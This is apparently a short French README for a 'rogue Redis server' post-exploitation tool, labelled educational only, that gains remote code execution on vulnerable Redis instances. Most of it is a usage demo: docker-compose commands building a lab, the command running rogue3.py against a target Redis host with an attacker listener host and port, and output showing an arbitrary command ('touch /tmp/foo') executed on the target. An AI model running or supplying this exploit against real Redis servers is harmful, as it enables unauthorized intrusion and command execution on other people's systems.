
Outil éducatif de serveur Redis malveillant pour la post-exploitation. Déploie un serveur Redis malveillant pour parvenir à une exécution de code à distance et exécuter des commandes arbitraires sur des instances Redis vulnérables.
À des fins éducatives uniquement
$ docker-compose build
$ docker-compose up -d
$ docker-compose exec rogue sh
/rogue/redis-rogue-server # python3 rogue3.py --rhost redis --rport 6379 --lhost rogue --lport 21000
...
[<<] touch /tmp/foo
$ docker-compose exec redis sh
/data # ls /tmp/
foo